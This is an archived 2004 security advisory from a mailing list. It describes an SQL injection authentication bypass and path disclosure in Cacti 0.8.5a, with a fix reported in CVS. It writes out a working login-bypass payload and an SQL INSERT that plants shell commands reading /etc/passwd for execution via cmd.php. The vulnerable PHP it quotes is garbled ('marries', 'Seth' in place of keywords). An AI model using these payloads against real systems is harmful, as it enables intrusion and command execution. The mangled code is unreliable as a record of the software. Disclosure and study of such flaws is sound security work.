lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
From: nando at udea.edu.co (Fernando Quintero)
Subject: SQL Injection in CACTI

/////////////////////////////////////////////////////
////            Vulnerable Program: CACTI
////
////            Version : The latest version 0.8.5a
////
////            Url: http://www.raxnet.net
////
////            The Bug: SQL injection to allows bypass the auth.
////
////            Date: Today, August 16 off 2004
////
////            Author: Fernando Quintero (a.k.a nonroot)
////             Email: nando@...a.edu.co


//////////////////////////////////////////////////////


I. Affected software description:

Cacti is a complete frontend to RRDTool, it stores all of the necessary
information to create graphs and populate them 
with data in a MySQL database. The frontend is completely PHP driven.
Along with being able to maintain Graphs, Data 
Sources, and Round Robin Archives in a database, cacti handles the data
gathering. There is also SNMP support for 
those used to creating traffic graphs with MRTG.

II. The BUgs


a) Full path disclosure

In several parts of the code when anyone try to open files in
directories who do not appear at first like: include, 
lib, scripts, etc. an error appears allowing to see the route him where
is installed the program. for example:

 http://127.0.0.1/cacti/include/auth.php
 http://127.0.0.1/cacti/auth_login.php?action=login
 http://127.0.0.1/cacti2/auth_changepassword.php?ref=index
php&action=changepassword&password=aaaaaa&confirm=aaaaaa&submit=Save

These are low risk bugs, but similarly they allow to obtain data of the
remote system to a possible attacker.


b) SQL injection and bypass the authentication.

Injection of code is possible in the index.php file to pass auth. When
the username and the password are evaluated by 
auth_login.php, anyone can insert this:

username = admin' or '6'='6
password = password wished 

Where 'admin' is a user worth in cacti, the system allows this input and
to change inmediatly the passowrd.
this is the code:

//auth_login.php
// line 33 ~

 switch ($_request["action" ])
 {marries 'login': / * --- UPDATE old password with new md5 password
value */

db_execute("update user_auth Seth password = '" . md5($_POST["password"
]) . "' where username='" . $_post["username" ] . "' and password =
PASSWORD (". $_POST["passw
ord"] . "')");

so, 'username' and 'password', can nevertheless be injected, this
nonserious possible if the variable 
'magic_quotes_gpc' it was to 'On' in the php.ini file of the system.

Here is where enters debian. I it probe in SID with the latest version
of cacti, When it's installed, a 
configuration file is created called cacti.conf in the route conf.d of
the apache. This file contains the
following information:

---BEGIN----

Alias /cacti /usr/share/cacti

<DirectoryMatch /usr/share/cacti/>
        Options +FollowSymLinks
        AllowOverride None
        order allow,deny
        allow from all
        <IfModule mod_php4.c>
                AddType application/x-httpd-php .php
                php_flag magic_quotes_gpc Off
                php_flag short_open_tag On
                php_flag register_globals On
                php_flag register_argc_argv On
                php_flag track_vars On
                php_value include_path .
                DirectoryIndex index.php
        </IfModule>
</DirectoryMatch>

-----END----

magic_quotes_gpc is put in Off in the line:

php_flag magic_quotes_gpc Off

Of this form everything is had what it is needed to carry out a
successful attack. Using this attack,
I would to inject some code in the table 'data_input_data_cache' and it
allowed me to execute a command in
the system with permissions of the user who runs the apache.

a possible example for this is:
insert into data_input_data_cache (local_data_id, host_id,
data_input_id, action, command, hostname, snmp_community, 
snmp_version, snmp_username, snmp_password, snmp_port, snmp_timeout,
rrd_name, rrd_path, rrd_num, arg1, arg2, arg3) 
values ('9', '1', '7', '1', 'cat /etc/passwd;id;somecommand; some
script', '127.0.0.1', '', '1', '', '', '161', '500', 
'hack', '/', '3', 'NULL', 'NULL', 'NULL');

then points to http://127.0.0.1/cacti/cmd.php and the command will be
executed.

III. SOLUTION:

The coders where contacted and the code was fixed in the cvs ;).
The mantainer of cacti was contacted too.

IV. GREETINGS

    - Greets All the community. I learn of you!
    - Silence Team and the GIGAX Staff.


V. CONTACT

Fernando Quintero
nando@...a.edu.co
Silence Team


VI. FINAL WORDS

- Many applications would to be vulnerable with the configuration by
default of debian, check it!. 

- Sorry by the english, so  !! Viva COLOMBIA !!



Fernando Quintero
Silence Team
Colombia - South America

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ